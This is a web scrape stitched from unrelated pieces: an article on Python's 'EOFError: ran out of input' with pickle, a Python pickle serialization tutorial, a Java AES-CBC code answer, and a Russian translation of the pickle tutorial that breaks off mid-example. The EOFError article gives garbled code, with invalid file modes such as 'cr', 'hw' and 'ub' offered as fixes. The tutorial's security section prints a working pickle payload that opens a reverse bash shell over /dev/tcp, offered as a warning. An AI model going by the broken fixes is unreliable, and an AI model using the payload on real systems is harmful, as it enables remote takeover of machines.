“Eoferror: ran out of input” is an error that occurs during the programming process. It generally happens because the file is empty and has no input.
Thus, instead of finishing the program the usual way, it shows an eoferror error message. In this guide, directions and solutions to troubleshoot this issue have been discussed.
Why Does an Eoferror: Ran Out of Input Error Occur?
The eoferror ran out of input error occurs mainly because a program calls out an empty file. Some other causes include:
- The file is empty.
- Using unnecessary functions in the program.
- Overwrite a pickle file.
- Using an unknown filename.
- Using an incorrect syntax: df=pickle.load(open(‘df.p’,’rb’))
– The File Is Empty
When a file is empty and has no input details in it, the program error occurs when that file is called out. It is also known as a pickle.load eoferror error.
Given below are a quick program and its output that explains the cause of the error.
Program:
scores = {};
with open(target, “rb”) as file:
unpickler = pickle.Unpickler(file);
scores = unpickler.load();
if not isinstance(scores, dict):
scores = {};
Output:
File “G:pythonpenduuser_test.py”, line 3, in :
save_user_points(“Magixs”, 31);
File “G:pythonpenduuser.py”, line 22, in save_user_points:
scores = unpickler.load();
EOFError: Ran out of input
Now, the reason why this error occurred was that the program called an empty file, and no other command was given.
– Using Unnecessary Functions in the Program
Sometimes, using an unnecessary function in the program can lead to undefined behavior in the output or errors such as EOFError: Ran out of the input.
Therefore, avoid using functions that are not required. Here’s the same example from above for avoiding confusion:
scores = {};
with open(target, “rb”) as file:
unpickler = pickle.Unpickler(file);
scores = unpickler.load();
if not isinstance(scores, dict):
scores = {};
– Overwrite a Pickle File
Sometimes, an empty pickle file can come as a surprise. This is because the programmer may have opened the filename through ‘bw’ or some other mode that could have overwritten the file.
Here’s an example of overwritten filename program:
with open(filename, ‘bw’) as g:
classification_dict = pickle.load(g)
The function “classification_dict = pickle.load(g)” will overwrite the pickled file. This type of error can be made by mistake before using:
open(filename, ‘rb’) as g
Now, due to this, the programmer will get an EOFError because the previous block of code overwrote the do.pkl file.
– Using an Unknown File Name
This error occurs when the program has a filename that was not recognized earlier. Addressing an unrecognized filename in the middle of the program can cause various programming errors, including the “eoferror” error.
Eoferror has various types depending on the programming language and syntax. Some of them are:
- Eoferror: ran out of input pandas.
- Eoferror: ran out of input PyTorch.
- Eoferror: ran out of input yolov5.
– Using an Incorrect Syntax
When typing a program, one has to be careful with the usage of the syntax. Wrong functions at the wrong time are also included in syntax errors. Sometimes overwriting filenames can cause syntax errors. Here’s a quick example of writing a pickle file:
pickle.dump(dg,open(‘dg.a’,’hw’))
However, if the programmer copied this code to reopen it but forgot to change ‘wb’ to ‘rb’, then that can cause overwriting syntax error:
dg=pickle.load(open(‘dg.a’,’hw’))
There are multiple ways in which this error can be resolved. Some common ways to fix this issue include using an additional command to show that the file is empty, avoiding unnecessary functions in the program and refraining from overwriting the pickle file.
A well-known way to fix this issue is by setting a condition in case the file is empty. If the condition is not included in the coding, an eoferror error will occur. The “ran out of input” means the end of a file and that it is empty.
– Use an Additional Command To Show That the File Is Empty
While typing a program and addressing a file, use an additional command that does not cause any error in the output due to an empty file. The error “eoferror ran out of input” can be easily fixed by doing what is recommended.
Let’s use the same example given above at the start. To fix that error, here’s how the program should have been written:
scores = {}
if os.path.getsize(target) > 0:
with open(target, “cr”) as h:
unpickler = pickle.Unpickler(h)
# if the file is not empty, scores will be equal
# to the value unpickled
scores = unpickler.load()
– Avoid Using an Unnecessary Function in the Program
As the heading explains itself, do not use unnecessary functions while coding because it can confuse the programmer, thus causing eoferror error in the output.
The top line containing, the “Open(target, ‘a’).close()” function is not necessary in the program given in the section “using unnecessary function in the program”. Thus, it can cause issues or confusion to programmers while typing codes.
– Avoid Overwriting a Pickle File
Another way to remove the program’s eoferror errors is by rechecking and correcting the overwritten pickle file. The programmer can also try to avoid overwriting files using different techniques.
It is recommended to keep a note of the files the programmer will be using in the program to avoid confusion. Previously, an example was given in the section, “Using an incorrect syntax”, so keeping that in mind, be careful with the overwriting of files.
Here is the example with the correct syntax to avoid overwriting:
dg=pickle.load(open(‘dg.e’,’gb’))
This has caused an overwriting issue. The correct way is:
dg=pickle.load(open(‘dg.e’,’ub’))
– Do Not Use an Unknown Filename
Before calling out any filename, it must be registered in the library while programming so that the user may have desired output when it is called. However, it is considered an unknown filename if it is not registered and the file has been called out.
Calling an unknown filename causes an eoferror error message in your developing platform. The user will be unable to get the desired output and will end up stuck in this error. For example, the user entered two filenames in the program, but only one is registered, and the other isn’t.
Let’s take “gd” as a registered filename and “ar” as a non-registered filename (unknown). Therefore:
scores = {} # scores is an empty dict already
if os.path.getsize(target) > 0:
with open(target, “ar”) as g:
unpickler = pickle.Unpickler(g)
# if the file is not empty, scores will be equal
# to the value unpickled
scores = unpickler.load()
As seen above, the filename used here is unknown to the program. Thus, the output of this program will include errors. So, make sure the file is registered.
– Use the Correct Syntax
This is another common reason for the eoferror input error while typing a program in the python programming language. Therefore, an easy way to resolve this is by taking a few notes.
Before starting the coding process, search and note down the basic syntaxes of that particular program, such as Python, Java and C++ etc.
Doing so will help beginners and make it significantly easy for them to avoid syntax errors while coding. Make sure to enter the correct syntax and do not overwrite, as that too can cause syntax errors.
FAQs
1. How To Fix Eoferror Eof When Reading a Line in Python Without Errors?
The most common reason behind Eoferror is that you have reached the end of the file without reading all the data. To fix this error, make sure to read all the data in the file before trying to access its contents. It can be done by using a loop to read through the file’s contents.
2. How To Read a Pickle File in Python To Avoid an Eoferror Error?
The programmer can use the pandas library to read a pickle file in Python. The pandas module has a read_pickle() method that can be used to read a pickle file. By using this, one can avoid the eoferror empty files issue.
This is because the pandas library in Python detects such errors beforehand. Resulting in a much smoother programming experience.
Conclusion
After reading this article thoroughly, the reader will be able to do their programming much more quickly because they’ll know why the eoferror ran out of input error messages. Here is a quick recap of this guide:
- The eoferror error usually occurs when the file is empty or the filename is accidentally overwritten.
- The best way to avoid errors like eoferror is by correcting the syntax
- Ensure that before calling the pickled file, the program should also have an alternative command in case the pickled file is empty and has no input in it.
- When working in Jupyter, or the console (Spyder), write a wrapper over the reading/writing code and call the wrapper subsequently.
The reader can now tactfully handle this error and continue doing their programming efficiently, and if you have some difficulty, feel free to come back to read this guide. Thank you for reading!
- Author
- Recent Posts
Position Is Everything: Your Go-To Resource for Learn & Build: CSS,JavaScript,HTML,PHP,C++ and MYSQL.
Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding: Serializing Objects With the Python pickle Module
As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process called serialization, which is fully supported by the standard library thanks to the Python pickle
module.
In this tutorial, you’ll learn:
- What it means to serialize and deserialize an object
- Which modules you can use to serialize objects in Python
- Which kinds of objects can be serialized with the Python
pickle
module - How to use the Python
pickle
module to serialize object hierarchies - What the risks are when deserializing an object from an untrusted source
Let’s get pickling!
Serialization in Python
The serialization process is a way to convert a data structure into a linear form that can be stored or transmitted over a network.
In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to as marshalling. The reverse process, which takes a stream of bytes and converts it back into a data structure, is called deserialization or unmarshalling.
Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training.
Python offers three different modules in the standard library that allow you to serialize and deserialize objects:
- The
marshal
module - The
json
module - The
pickle
module
In addition, Python supports XML, which you can also use to serialize objects.
The marshal
module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the .pyc
files you get when the interpreter imports a Python module. So, even though you can use marshal
to serialize some of your objects, it’s not recommended.
The json
module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange.
There are several reasons to choose the JSON format: It’s human readable and language independent, and it’s lighter than XML. With the json
module, you can serialize and deserialize several standard Python types:
bool
dict
int
float
list
string
tuple
None
The Python pickle
module is another way to serialize and deserialize objects in Python. It differs from the json
module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects.
So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case.
Here are three general guidelines for deciding which approach to use:
-
Don’t use the
marshal
module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways. -
The
json
module and XML are good choices if you need interoperability with different languages or a human-readable format. -
The Python
pickle
module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go withpickle
.
Inside the Python pickle
Module
The Python pickle
module basically consists of four methods:
pickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
The first two methods are used during the pickling process, and the other two are used during unpickling. The only difference between dump()
and dumps()
is that the first creates a file containing the serialization result, whereas the second returns a string.
To differentiate dumps()
from dump()
, it’s helpful to remember that the s
at the end of the function name stands for string
. The same concept also applies to load()
and loads()
: The first one reads a file to start the unpickling process, and the second one operates on a string.
Consider the following example. Say you have a custom-defined class named example_class
with several different attributes, each of a different type:
a_number
a_string
a_dictionary
a_list
a_tuple
The example below shows how you can instantiate the class and pickle the instance to get a plain string. After pickling the class, you can change the value of its attributes without affecting the pickled string. You can then unpickle the pickled string in another variable, restoring an exact copy of the previously pickled class:
# pickling.py
import pickle
class example_class:
a_number = 35
a_string = "hey"
a_list = [1, 2, 3]
a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
a_tuple = (22, 23)
my_object = example_class()
my_pickled_object = pickle.dumps(my_object) # Pickling the object
print(f"This is my pickled object:n{my_pickled_object}n")
my_object.a_dict = None
my_unpickled_object = pickle.loads(my_pickled_object) # Unpickling the object
print(
f"This is a_dict of the unpickled object:n{my_unpickled_object.a_dict}n")
In the example above, you create several different objects and serialize them with pickle
. This produces a single string with the serialized result:
$ python pickling.py
This is my pickled object:
b'x80x03c__main__nexample_classnqx00)x81qx01.'
This is a_dict of the unpickled object:
{'first': 'a', 'second': 2, 'third': [1, 2, 3]}
The pickling process ends correctly, storing your entire instance in this string: b'x80x03c__main__nexample_classnqx00)x81qx01.'
After the pickling process ends, you modify your original object by setting the attribute a_dict
to None
.
Finally, you unpickle the string to a completely new instance. What you get is a deep copy of your original object structure from the time that the pickling process began.
Protocol Formats of the Python pickle
Module
As mentioned above, the pickle
module is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you’re working with Python, it’s important to know that the pickle
module has evolved over time.
This means that if you’ve pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process.
There are currently six different protocols that the Python pickle
module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling.
- Protocol version 0 was the first version. Unlike later protocols, it’s human readable.
- Protocol version 1 was the first binary format.
- Protocol version 2 was introduced in Python 2.3.
- Protocol version 3 was added in Python 3.0. It can’t be unpickled by Python 2.x.
- Protocol version 4 was added in Python 3.4. It features support for a wider range of object sizes and types and is the default protocol starting with Python 3.8.
- Protocol version 5 was added in Python 3.8. It features support for out-of-band data and improved speeds for in-band data.
To choose a specific protocol, you need to specify the protocol version when you invoke load()
, loads()
, dump()
or dumps()
. If you don’t specify a protocol, then your interpreter will use the default version specified in the pickle.DEFAULT_PROTOCOL
attribute.
Picklable and Unpicklable Types
You’ve already learned that the Python pickle
module can serialize many more types than the json
module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others.
If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such as dill
.
The dill
module extends the capabilities of pickle
. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others.
To test this module, you can try to pickle a lambda
function:
# pickling_error.py
import pickle
square = lambda x : x * x
my_pickle = pickle.dumps(square)
If you try to run this program, then you will get an exception because the Python pickle
module can’t serialize a lambda
function:
$ python pickling_error.py
Traceback (most recent call last):
File "pickling_error.py", line 6, in <module>
my_pickle = pickle.dumps(square)
_pickle.PicklingError: Can't pickle <function <lambda> at 0x10cd52cb0>: attribute lookup <lambda> on __main__ failed
Now try replacing the Python pickle
module with dill
to see if there’s any difference:
# pickling_dill.py
import dill
square = lambda x: x * x
my_pickle = dill.dumps(square)
print(my_pickle)
If you run this code, then you’ll see that the dill
module serializes the lambda
without returning an error:
$ python pickling_dill.py
b'x80x03cdill._dilln_create_functionnqx00(cdill._dilln_load_typenqx01Xx08x00x00x00CodeTypeqx02x85qx03Rqx04(Kx01Kx00Kx01Kx02KCCx08|x00|x00x14x00Sx00qx05Nx85qx06)Xx01x00x00x00xqx07x85qx08Xx10x00x00x00pickling_dill.pyqtXtx00x00x00squareqnKx04Cx00qx0b))tqx0cRqrc__builtin__n__main__nhnNN}qx0eNtqx0fRqx10.'
Another interesting feature of dill
is that it can even serialize an entire interpreter session. Here’s an example:
>>>
>>> square = lambda x : x * x
>>> a = square(35)
>>> import math
>>> b = math.sqrt(484)
>>> import dill
>>> dill.dump_session('test.pkl')
>>> exit()
In this example, you start the interpreter, import a module, and define a lambda
function along with a couple of other variables. You then import the dill
module and invoke dump_session()
to serialize the entire session.
If everything goes okay, then you should get a test.pkl
file in your current directory:
$ ls test.pkl
4 -rw-r--r--@ 1 dave staff 439 Feb 3 10:52 test.pkl
Now you can start a new instance of the interpreter and load the test.pkl
file to restore your last session:
>>>
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>)])
>>> import dill
>>> dill.load_session('test.pkl')
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>), ('dill', <module 'dill' from '/usr/local/lib/python3.7/site-packages/dill/__init__.py'>), ('square', <function <lambda> at 0x10a013a70>), ('a', 1225), ('math', <module 'math' from '/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/lib-dynload/math.cpython-37m-darwin.so'>), ('b', 22.0)])
>>> a
1225
>>> b
22.0
>>> square
<function <lambda> at 0x10a013a70>
The first globals().items()
statement demonstrates that the interpreter is in the initial state. This means that you need to import the dill
module and call load_session()
to restore your serialized interpreter session.
Even though dill
lets you serialize a wider range of objects than pickle
, it can’t solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you’re in for a tough time because it’s an unserializable object even for dill
.
So, how can you solve this problem?
The solution in this case is to exclude the object from the serialization process and to reinitialize the connection after the object is deserialized.
You can use __getstate__()
to define what should be included in the pickling process. This method allows you to specify what you want to pickle. If you don’t override __getstate__()
, then the default instance’s __dict__
will be used.
In the following example, you’ll see how you can define a class with several attributes and exclude one attribute from serialization with __getstate()__
:
# custom_pickling.py
import pickle
class foobar:
def __init__(self):
self.a = 35
self.b = "test"
self.c = lambda x: x * x
def __getstate__(self):
attributes = self.__dict__.copy()
del attributes['c']
return attributes
my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)
In this example, you create an object with three attributes. Since one attribute is a lambda
, the object is unpicklable with the standard pickle
module.
To address this issue, you specify what to pickle with __getstate__()
. You first clone the entire __dict__
of the instance to have all the attributes defined in the class, and then you manually remove the unpicklable c
attribute.
If you run this example and then deserialize the object, then you’ll see that the new instance doesn’t contain the c
attribute:
$ python custom_pickling.py
{'a': 35, 'b': 'test'}
But what if you wanted to do some additional initializations while unpickling, say by adding the excluded c
object back to the deserialized instance? You can accomplish this with __setstate__()
:
# custom_unpickling.py
import pickle
class foobar:
def __init__(self):
self.a = 35
self.b = "test"
self.c = lambda x: x * x
def __getstate__(self):
attributes = self.__dict__.copy()
del attributes['c']
return attributes
def __setstate__(self, state):
self.__dict__ = state
self.c = lambda x: x * x
my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)
By passing the excluded c
object to __setstate__()
, you ensure that it appears in the __dict__
of the unpickled string.
Compression of Pickled Objects
Although the pickle
data format is a compact binary representation of an object structure, you can still optimize your pickled string by compressing it with bzip2
or gzip
.
To compress a pickled string with bzip2
, you can use the bz2
module provided in the standard library.
In the following example, you’ll take a string, pickle it, and then compress it using the bz2
library:
>>>
>>> import pickle
>>> import bz2
>>> my_string = """Per me si va ne la città dolente,
... per me si va ne l'etterno dolore,
... per me si va tra la perduta gente.
... Giustizia mosse il mio alto fattore:
... fecemi la divina podestate,
... la somma sapienza e 'l primo amore;
... dinanzi a me non fuor cose create
... se non etterne, e io etterno duro.
... Lasciate ogne speranza, voi ch'intrate."""
>>> pickled = pickle.dumps(my_string)
>>> compressed = bz2.compress(pickled)
>>> len(my_string)
315
>>> len(compressed)
259
When using compression, bear in mind that smaller files come at the cost of a slower process.
Security Concerns With the Python pickle
Module
You now know how to use the pickle
module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object’s state to disk or to transmit it over a network.
However, there’s one more thing you need to know about the Python pickle
module: It’s not secure. Do you remember the discussion of __setstate__()
? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process!
So, what can you do to reduce this risk?
Sadly, not much. The rule of thumb is to never unpickle data that comes from an untrusted source or is transmitted over an insecure network. In order to prevent man-in-the-middle attacks, it’s a good idea to use libraries such as hmac
to sign the data and ensure it hasn’t been tampered with.
The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell:
# remote.py
import pickle
import os
class foobar:
def __init__(self):
pass
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
# The attack is from 192.168.1.10
# The attacker is listening on port 8080
os.system('/bin/bash -c
"/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')
my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
In this example, the unpickling process executes __setstate__()
, which executes a Bash command to open a remote shell to the 192.168.1.10
machine on port 8080
.
Here’s how you can safely test this script on your Mac or your Linux box. First, open the terminal and use the nc
command to listen for a connection to port 8080:
This will be the attacker terminal. If everything works, then the command will seem to hang.
Next, open another terminal on the same computer (or on any other computer on the network) and execute the Python code above for unpickling the malicious code. Be sure to change the IP address in the code to your attacking terminal’s IP address. In my example, the attacker’s IP address is 192.168.1.10
.
By executing this code, the victim will expose a shell to the attacker:
If everything works, a Bash shell will appear on the attacking console. This console can now operate directly on the attacked system:
$ nc -l 8080
bash: no job control in this shell
The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$
So, let me repeat this critical point once again: Do not use the pickle
module to deserialize objects from untrusted sources!
Conclusion
You now know how to use the Python pickle
module to convert an object hierarchy to a stream of bytes that can be saved to a disk or transmitted over a network. You also know that the deserialization process in Python must be used with care since unpickling something that comes from an untrusted source can be extremely dangerous.
In this tutorial, you’ve learned:
- What it means to serialize and deserialize an object
- Which modules you can use to serialize objects in Python
- Which kinds of objects can be serialized with the Python
pickle
module - How to use the Python
pickle
module to serialize object hierarchies - What the risks are of unpickling from an untrusted source
With this knowledge, you’re well equipped to persist your objects using the Python pickle
module. As an added bonus, you’re ready to explain the dangers of deserializing malicious pickles to your friends and coworkers.
If you have any questions, then leave a comment down below or contact me on Twitter!
Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding: Serializing Objects With the Python pickle Module
The main issue in your code was caused by a failure to specify an IV value. You must specify an IV value when doing CBC-mode encryption and use that same value when performing the CBC-mode decryption.
Another problem is the mix and match of creating strings from byte arrays and base64-encoding. You also return null
from your decrypt method every time. Even if you meant return original.toString();
, that’s still wrong (because toString()
doesn’t do what you wish it would on a byte array).
Below is an improved version of your code. It’s far from optimal, but it compiles and works. You need to improve this to use a random IV. Also, if you plan to derive keys from passwords, don’t just get the bytes, use a derivation function such as PBKDF2. You can see an example of using PBKDF2 in the JNCryptor source.
public class EncryptionTest {
public static void main(String[] args) {
try {
String key = "ThisIsASecretKey";
byte[] ciphertext = encrypt(key, "1234567890123456");
System.out.println("decrypted value:" + (decrypt(key, ciphertext)));
} catch (GeneralSecurityException e) {
e.printStackTrace();
}
}
public static byte[] encrypt(String key, String value)
throws GeneralSecurityException {
byte[] raw = key.getBytes(Charset.forName("UTF-8"));
if (raw.length != 16) {
throw new IllegalArgumentException("Invalid key size.");
}
SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
cipher.init(Cipher.ENCRYPT_MODE, skeySpec,
new IvParameterSpec(new byte[16]));
return cipher.doFinal(value.getBytes(Charset.forName("UTF-8")));
}
public static String decrypt(String key, byte[] encrypted)
throws GeneralSecurityException {
byte[] raw = key.getBytes(Charset.forName("UTF-8"));
if (raw.length != 16) {
throw new IllegalArgumentException("Invalid key size.");
}
SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
cipher.init(Cipher.DECRYPT_MODE, skeySpec,
new IvParameterSpec(new byte[16]));
byte[] original = cipher.doFinal(encrypted);
return new String(original, Charset.forName("UTF-8"));
}
}
Время от времени требуется сохранить на диск или отослать по сети объект со сложной структурой. Например, текущее состояние нейронной сети, находящейся в процессе обучения. Процесс перевода структуры данных в цепочку битов называется сериализацией.
После прочтения статьи вы будете знать:
- что такое сериализация и десериализация;
- как применять эти процессы для собственного удобства;
- какие существуют встроенные и сторонние библиотеки Python для сериализации;
- чем отличаются протоколы
pickle
; - в чём преимущество
dill
передpickle
; - как с помощью
dill
сохранить сессию интерпретатора; - можно ли сжать сериализованные данные;
- какие бывают проблемы с безопасностью процесса десериализации.
Итак, сериализация (англ. serialization, marshalling) – это способ преобразования структуры данных в линейную форму, которую можно сохранить или передать по сети. Обратный процесс преобразования сериализованного объекта в исходную структуру данных называется десериализацией (англ. deserialization, unmarshalling).
В стандартной библиотеке Python три модуля позволяют сериализовать и десериализовать объекты:
marshal
json
pickle
Кроме того, Python поддерживает XML, который также можно применять для сериализации объектов.
Самый старый модуль из перечисленных – marshal
. Он используется для чтения и записи байт-кода модулей Python и .pyc
-файлов, создаваемых при импорте модулей Python. Хотя его и можно использовать для сериализации, делать это не рекомендуется.
Модуль json
обеспечивает работу со стандартными файлами JSON. Это широко используемый формат обмена данными, удобный для чтения и не зависящий от языка программирования. С помощью модуля json
вы можете сериализовать и десериализовать стандартные типы данных Python:
bool
dict
int
float
list
string
tuple
None
Наконец, ещё один встроенный способ сериализации и десериализации объектов в Python – модуль pickle
. Он отличается от модуля json
тем, что сериализует объекты в двоичном виде. То есть результат не может быть прочитан человеком. Кроме того, pickle
работает быстрее и позволяет сериализовать многие другие типы Python, включая пользовательские.
Внутри модуля pickle
Модуль pickle
содержит четыре основные функции:
pickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
Первые два метода применяются для сериализации, а два других – для обратного процесса. Разница между первыми двумя методами заключается в том, что dump
создаёт файл, содержащий результат сериализации, а dumps
– возвращает байтовую строку. То же самое относится к load
и loads
.
Рассмотрим пример. Допустим, есть пользовательский класс example_class
с несколькими атрибутами (a_number
, a_string
, a_dictionary
, a_list
, a_tuple
), каждый из которых имеет свой тип.
В коде ниже показано, как создаётся и сериализуется экземпляр класса. Затем мы изменяем значение внутреннего словаря. Для восстановления исходной структуры можно использовать сохранённый с помощью pickle
объект.
import pickle
class example_class:
a_number = 35
a_string = "hey"
a_list = [1, 2, 3]
a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
a_tuple = (22, 23)
my_object = example_class()
my_pickled_object = pickle.dumps(my_object) # Pickling the object
print(f"This is my pickled object:n{my_pickled_object}n")
my_object.a_dict = None
my_unpickled_object = pickle.loads(my_pickled_object) # Unpickling the object
print(
f"This is a_dict of the unpickled object:n{my_unpickled_object.a_dict}n")
$ python pickling.py
This is my pickled object:
b'x80x03c__main__nexample_classnqx00)x81qx01.'
This is a_dict of the unpickled object:
{'first': 'a', 'second': 2, 'third': [1, 2, 3]}
Таким образом, pickle
создаёт глубокую копию исходной структуры.
Форматы протоколов модуля pickle
Модуль pickle
специфичен для Python — результаты сериализации могут быть прочитаны только другой программой на Python. Но даже если вы работаете только с Python, полезно знать, как модуль эволюционировал со временем. От версии протокола зависит совместимость. Сейчас существует 6 версий протоколов:
- 0 — в отличие от более поздних протоколов, был удобочитаемым.
- 1 — первый двоичный формат.
- 2 — представлен в Python 2.3.
- 3 — добавлен в Python 3.0. Его нельзя выбрать в версиях Python 2.x.
- 4 — добавлен в Python 3.4, поддерживает более широкий диапазон размеров и типов объектов, и является протоколом по умолчанию с версии 3.8.
- 5 — добавлен в Python 3.8, имеет поддержку внеполосных данных и улучшает скорость для внутриполосных.
Примечание
Более новые версии предлагают больше функций и улучшений, но ограничены более высокими версиями интерпретатора. Учитывайте это при выборе протокола. Самый высокий протокол, поддерживаемый интерпретатором, хранится в атрибуте pickle.HIGHEST_PROTOCOL
.
Чтобы выбрать конкретный протокол, укажите версию протокола при вызове функции модуля. Иначе будет использоваться версия, соответствующая атрибуту pickle.DEFAULT_PROTOCOL
.
Сериализуемые и несериализуемые типы
Мы уже знаем, что модуль pickle
сериализует гораздо больше типов, чем json
. Но всё-таки не все. Список несериализуемых с помощью pickle
объектов включает соединения с базами данных, открытые сетевые сокеты и действующие потоки. Если вы столкнулись с несериализуемым объектом, есть несколько способов решения проблемы. Первый вариант – использовать стороннюю библиотеку dill
.
Модуль dill
расширяет возможности pickle
. Согласно официальной документации он позволяет сериализовать менее распространённые типы данных, например, вложенные функции (inner functions) и лямбда-выражения. Проверим на примере:
import pickle
square = lambda x : x * x
my_pickle = pickle.dumps(square)
Попытавшись запустить эту программу, мы получим исключение: pickle
не может сериализовать лямбда-функцию:
$ python pickling_error.py
Traceback (most recent call last):
File "pickling_error.py", line 6, in <module>
my_pickle = pickle.dumps(square)
_pickle.PicklingError: Can't pickle <function <lambda> at 0x10cd52cb0>: attribute lookup <lambda> on __main__ failed
Попробуем заменить pickle
на dill
(библиотеку можно установить с помощью pip):
import dill
square = lambda x: x * x
my_pickle = dill.dumps(square)
print(my_pickle)
Запустим код и увидим, что модуль dill
сериализует лямбда-функцию без ошибок:
$ python pickling_dill.py
b'x80x03cdill._dilln_create_functionnqx00(cdill._dilln_load_typenqx01Xx08x00x00x00CodeTypeqx02x85qx03Rqx04(Kx01Kx00Kx01Kx02KCCx08|x00|x00x14x00Sx00qx05Nx85qx06)Xx01x00x00x00xqx07x85qx08Xx10x00x00x00pickling_dill.pyqtXtx00x00x00squareqnKx04Cx00qx0b))tqx0cRqrc__builtin__n__main__nhnNN}qx0eNtqx0fRqx10.'
Ещё одна особенность dill
заключается в том, что он умеет сериализовать сеанс интерпретатора:
>>> square = lambda x : x * x
>>> a = square(35)
>>> import math
>>> b = math.sqrt(484)
>>> import dill
>>> dill.dump_session('test.pkl')
>>> exit()
В этом примере после запуска интерпретатора и ввода нескольких выражений мы импортируем модуль dill
и вызываем dump_session()
для сериализации сеанса в файле test.pkl
в текущем каталоге:
$ ls test.pkl
4 -rw-r--r--@ 1 dave staff 439 Feb 3 10:52 test.pkl
Запустим новый экземпляр интерпретатора и загрузим файл test.pkl
для восстановления последнего сеанса:
>>> import dill
>>> dill.load_session('test.pkl')
>>> a
1225
>>> b
22.0
>>> square
<function <lambda> at 0x10a013a70>
Примечание
Прежде чем начать использовать dill
вместо pickle
, имейте в виду, что dill
не включён в стандартную библиотеку Python и обычно работает медленнее, чем pickle
.
Модуль dill
охватывает гораздо более широкий диапазон объектов, чем pickle
, но не решает всех проблем сериализации. К примеру, даже dill
не может сериализовать объект, содержащий соединение с базой данных.
В подобных случаях нужно исключить несериализуемый объект из процесса сериализации и повторно инициализировать после десериализации.
Чтобы указать, что должно быть включено в процесс сериализации, нужно использовать метод __getstate__()
. Если этот метод не переопределён, будет использоваться дефолтный __dict__()
.
В следующем примере показано, как можно определить класс с несколькими атрибутами и исключить один атрибут из сериализации с помощью __getstate__()
:
import pickle
class foobar:
def __init__(self):
self.a = 35
self.b = "test"
self.c = lambda x: x * x
def __getstate__(self):
attributes = self.__dict__.copy()
del attributes['c']
return attributes
my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)
В приведённом примере мы создаём объект с тремя атрибутами. Поскольку один из атрибутов – это лямбда-объект, его нельзя обработать с помощью pickle
. Поэтому в __getstate__()
мы сначала клонируем весь __dict__
, а затем удаляем несериализуемый атрибут с
.
Если мы запустим этот пример, а затем десериализуем объект, то увидим, что новый экземпляр не содержит атрибут c
:
$ python custom_pickling.py
{'a': 35, 'b': 'test'}
Мы также можем выполнить дополнительные инициализации в процессе десериализации. Например, добавить исключённый объект c
обратно в десериализованную сущность. Для этого используется метод __setstate__()
:
import pickle
class foobar:
def __init__(self):
self.a = 35
self.b = "test"
self.c = lambda x: x * x
def __getstate__(self):
attributes = self.__dict__.copy()
del attributes['c']
return attributes
def __setstate__(self, state):
self.__dict__ = state
self.c = lambda x: x * x
my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
